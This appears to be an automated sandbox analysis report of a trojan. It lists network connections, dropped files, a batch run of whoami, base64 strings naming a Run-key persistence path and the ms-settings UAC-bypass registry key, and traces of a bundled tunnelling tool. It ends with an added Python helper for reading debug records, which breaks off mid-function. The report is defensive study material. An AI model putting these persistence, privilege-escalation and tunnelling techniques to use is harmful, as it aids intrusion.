Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown | Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown | Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown | Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown | Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown | HTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: C:\ProgramData\uovan\svrreve.exe | Code function: 2_2_00007FFD9BA11322 NtSetInformationProcess
Source: C:\ProgramData\uovan\svrreve.exe | Code function: 2_2_00007FFD9BA17B31 NtSetInformationProcess
Source: C:\ProgramData\uovan\svrreve.exe | Code function: 13_2_00007FFD9BA01318
Source: C:\ProgramData\uovan\svrreve.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7924 -s 820
Source: ubes6SC7Vd.exe, 00000000.00000000.1687562602.00000258F2ACA000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamepidgins8 vs ubes6SC7Vd.exe
Source: ubes6SC7Vd.exe | Binary or memory string: OriginalFilenamepidgins8 vs ubes6SC7Vd.exe
Source: ubes6SC7Vd.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: ubes6SC7Vd.exe, Program.cs | Base64 encoded string: 'U09GVFdBUkVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg=='
Source: ubes6SC7Vd.exe, lunnisvet.cs | Base64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUG9saWNpZXNcU3lzdGVt', 'U29mdHdhcmVcQ2xhc3Nlc1xtcy1zZXR0aW5nc1xTaGVsbFxPcGVuXGNvbW1hbmQ=', 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUG9saWNpZXNcU3lzdGVt', 'U29mdHdhcmVcQ2xhc3Nlc1xtcy1zZXR0aW5nc1xTaGVsbFxPcGVuXGNvbW1hbmQ=', 'U1lTVEVNXFxDdXJyZW50Q29udHJvbFNldFxcQ29udHJvbFxcTHNh'
Source: svrreve.exe.0.dr | Binary string: \Device\Afd\Mio
Source: svrreve.exe.0.dr | Binary string: Failed to open \Device\Afd\Mio:
Source: classification engine | Classification label: mal100.troj.evad.winEXE@16/18@2/3
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ubes6SC7Vd.exe.log
Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8076
Source: C:\ProgramData\uovan\svrreve.exe | Mutant created: NULL
Source: C:\ProgramData\uovan\svrreve.exe | Mutant created: \Sessions\1\BaseNamedObjects\bC93EeUVlC
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7924
Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7536
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | File created: C:\Users\user\AppData\Local\Temp\tmpFD97.tmp
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFD97.tmp.bat""
Source: ubes6SC7Vd.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ubes6SC7Vd.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: ubes6SC7Vd.exe | Virustotal: Detection: 56%
Source: ubes6SC7Vd.exe | ReversingLabs: Detection: 44%
Source: ubes6SC7Vd.exe | String found in binary or memory: -helpPrint help (see more with '--help')Print help (see a summary with '-h')versionPrint this message or the help of the given subcommand(s)subcommandCOMMANDPrint help for the subcommand(s)
Source: ubes6SC7Vd.exe | String found in binary or memory: -helpPrint help (see more with '--help')Print help (see a summary with '-h')versionPrint this message or the help of the given subcommand(s)subcommandCOMMANDPrint help for the subcommand(s)
Source: ubes6SC7Vd.exe | String found in binary or memory: were provided was provided--helphelp
Source: ubes6SC7Vd.exe | String found in binary or memory: were provided was provided--helphelp
Source: ubes6SC7Vd.exe | String found in binary or memory: {before-help}{about-with-newline}
Source: ubes6SC7Vd.exe | String found in binary or memory: {all-args}{after-help}{before-help}{about-with-newline}
Source: ubes6SC7Vd.exe | String found in binary or memory: {usage-heading} {usage}{after-help}Usage:
Source: ubes6SC7Vd.exe | String found in binary or memory: &{before-help}{about-with-newline}
Source: ubes6SC7Vd.exe | String found in binary or memory: optionstab before-help{}
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | File read: C:\Users\user\Desktop\ubes6SC7Vd.exe
Source: unknown | Process created: C:\Users\user\Desktop\ubes6SC7Vd.exe "C:\Users\user\Desktop\ubes6SC7Vd.exe"
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Process created: C:\ProgramData\uovan\svrreve.exe "C:\ProgramData\uovan\svrreve.exe"
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFD97.tmp.bat""
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout 7
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\whoami.exe whoami
Source: unknown | Process created: C:\ProgramData\uovan\svrreve.exe "C:\ProgramData\uovan\svrreve.exe"
Source: C:\ProgramData\uovan\svrreve.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7924 -s 820
Source: unknown | Process created: C:\ProgramData\uovan\svrreve.exe "C:\ProgramData\uovan\svrreve.exe"
Source: C:\ProgramData\uovan\svrreve.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8076 -s 832
Source: C:\ProgramData\uovan\svrreve.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7536 -s 2476
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Process created: C:\ProgramData\uovan\svrreve.exe "C:\ProgramData\uovan\svrreve.exe"
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFD97.tmp.bat""
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout 7
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: rasman.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: mscoree.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: apphelp.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: kernel.appcore.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: version.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: windows.storage.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: wldp.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: profapi.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: uxtheme.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: cryptsp.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: rsaenh.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: cryptbase.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: rasapi32.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: rasman.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: rtutils.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: mswsock.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: winhttp.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: iphlpapi.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: dhcpcsvc6.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: dhcpcsvc.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: dnsapi.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: winnsi.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: rasadhlp.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: fwpuclnt.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: secur32.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: sspicli.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: schannel.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: mskeyprotect.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: ntasn1.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: ncrypt.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: ncryptsslp.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: msasn1.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: gpapi.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: wbemcomn.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: amsi.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\System32\timeout.exe | Section loaded: version.dll
Source: C:\Windows\System32\whoami.exe | Section loaded: version.dll
Source: C:\Windows\System32\whoami.exe | Section loaded: authz.dll
Source: C:\Windows\System32\whoami.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\whoami.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\whoami.exe | Section loaded: netutils.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: mscoree.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: kernel.appcore.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: version.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: windows.storage.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: wldp.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: profapi.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: uxtheme.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: mscoree.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: kernel.appcore.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: version.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: windows.storage.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: wldp.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: profapi.dll
Source: C:\ProgramData\uovan\svrreve.exe | Section loaded: uxtheme.dll
Source: C:\ProgramData\uovan\svrreve.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: C:\ProgramData\uovan\svrreve.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: ubes6SC7Vd.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: ubes6SC7Vd.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: ubes6SC7Vd.exe | Static file information: File size 1972736 > 1048576
Source: ubes6SC7Vd.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1c6c00
Source: ubes6SC7Vd.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: svrreve.exe, 00000002.00000002.2291618512.0000026DD95F9000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\a\bore\bore\target\x86_64-pc-windows-msvc\release\deps\bore.pdb source: ubes6SC7Vd.exe, svrreve.exe.0.dr
                          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: svrreve.exe, 00000002.00000002.2291618512.0000026DD95F9000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: pC:\ProgramData\uovan\svrreve.PDB source: svrreve.exe, 00000002.00000002.2287704101.000000B5990F5000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: svrreve.exe, 00000002.00000002.2289800804.0000026DC0F86000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: System.Windows.Forms.ni.pdb source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: System.Drawing.ni.pdb source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbw source: svrreve.exe, 00000002.00000002.2291618512.0000026DD9570000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: \??\C:\Windows\System.pdbe' source: svrreve.exe, 00000002.00000002.2291618512.0000026DD9609000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.Drawing.ni.pdbRSDS source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: System.Xml.pdb` source: WER2B3B.tmp.dmp.17.dr
                          Source: Binary string: \assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb" source: svrreve.exe, 00000002.00000002.2287704101.000000B5990F5000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: System.Xml.ni.pdbRSDS# source: WER2B3B.tmp.dmp.17.dr
                          Source: Binary string: System.Core.ni.pdb source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: C:\ProgramData\uovan\svrreve.PDBm source: svrreve.exe, 00000002.00000002.2287704101.000000B5990F5000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: System.Net.Http.pdbSystem.Management.dll source: WER2B3B.tmp.dmp.17.dr
                          Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER2B3B.tmp.dmp.17.dr
                          Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: System.Windows.Forms.pdb0 source: WER6CB.tmp.dmp.12.dr
                          Source: Binary string: mscorlib.ni.pdb source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: mscorlib.pdbra source: svrreve.exe, 00000002.00000002.2291618512.0000026DD961C000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\mscorlib.pdb source: svrreve.exe, 00000002.00000002.2291618512.0000026DD9609000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: mscorlib.pdbR source: svrreve.exe, 00000002.00000002.2291618512.0000026DD961C000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb=. source: svrreve.exe, 00000002.00000002.2291618512.0000026DD95F9000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER2B3B.tmp.dmp.17.dr
                          Source: Binary string: System.Net.Http.ni.pdbRSDS source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: System.Xml.ni.pdb source: WER2B3B.tmp.dmp.17.dr
                          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbZ source: svrreve.exe, 00000002.00000002.2291618512.0000026DD9570000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.ni.pdbRSDS source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: D:\a\bore\bore\target\x86_64-pc-windows-msvc\release\deps\bore.pdbz source: ubes6SC7Vd.exe, svrreve.exe.0.dr
                          Source: Binary string: System.Configuration.ni.pdb source: WER2B3B.tmp.dmp.17.dr
                          Source: Binary string: System.Net.Http.pdb source: svrreve.exe, 00000002.00000002.2289800804.0000026DC0F86000.00000004.00000800.00020000.00000000.sdmp, WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: C:\ProgramData\uovan\svrreve.PDB source: svrreve.exe, 00000002.00000002.2287704101.000000B5990F5000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: System.Configuration.pdb source: WER2B3B.tmp.dmp.17.dr
                          Source: Binary string: System.Xml.pdb source: WER2B3B.tmp.dmp.17.dr
                          Source: Binary string: System.pdb source: svrreve.exe, 00000002.00000002.2289800804.0000026DC0F86000.00000004.00000800.00020000.00000000.sdmp, WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: System.Windows.Forms.pdb source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: mscorlib.pdb source: svrreve.exe, 00000002.00000002.2289800804.0000026DC0F86000.00000004.00000800.00020000.00000000.sdmp, WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: System.Net.Http.ni.pdb source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: System.Drawing.pdb source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: System.Management.pdb source: WER2B3B.tmp.dmp.17.dr
                          Source: Binary string: svrreve.PDBdQ source: svrreve.exe, 00000002.00000002.2287704101.000000B5990F5000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: System.Management.ni.pdb source: WER2B3B.tmp.dmp.17.dr
                          Source: Binary string: System.Core.pdb source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: mscorlib.pdb source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: indoC:\Windows\mscorlib.pdb source: svrreve.exe, 00000002.00000002.2287704101.000000B5990F5000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: System.ni.pdb source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: System.Core.ni.pdbRSDS source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
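The PDB strings above come from two different places: the CodeView record the linker embedded in the binary (the bore.pdb path, a Rust build for the x86_64-pc-windows-msvc target whose D:\a\bore\bore layout is what GitHub-hosted Windows runners use for a repository checkout) and strings the .NET runtime leaves in memory while probing for symbols next to the image (svrreve.PDB, mscorlib.pdb). The following added example, written for this page rather than taken from the report or the sample, scans raw bytes for RSDS records, derives the symbol-server key, and tags the build path; the GUIDs and ages in the constructed blob are invented because the report shows only the paths.

```python
"""Recover CodeView (RSDS) debug records from a PE image or memory dump and turn
them into something an analyst can act on: the PDB path, the symbol-server key,
and a rough classification of where the binary was built.
Added example; not code from the report or from the sample."""
import re
import struct
import uuid
from dataclasses import dataclass


@dataclass(frozen=True)
class CodeView:
    guid: uuid.UUID
    age: int
    pdb_path: str

    @property
    def symbol_key(self) -> str:
        # Symbol-server lookup key: GUID as 32 upper-case hex digits, then the age in hex.
        return f"{self.guid.hex.upper()}{self.age:X}"


def parse_rsds(blob: bytes) -> list:
    """Scan raw bytes for records laid out as
    'RSDS' | GUID (16 bytes, Windows byte order) | age (u32 LE) | NUL-terminated path.
    A raw scan is deliberate: it also works on memory dumps and unpacked regions,
    where the debug directory may no longer be intact."""
    records = []
    for m in re.finditer(rb"RSDS", blob):
        off = m.end()
        if off + 20 > len(blob):
            continue  # truncated record
        raw_guid = blob[off:off + 16]
        (age,) = struct.unpack_from("<I", blob, off + 16)
        end = blob.find(b"\x00", off + 20)
        if end == -1:
            continue
        path = blob[off + 20:end]
        # Require a printable path naming a .pdb; drops chance matches in random data.
        if b".pdb" not in path.lower() or not all(0x20 <= c < 0x7F for c in path):
            continue
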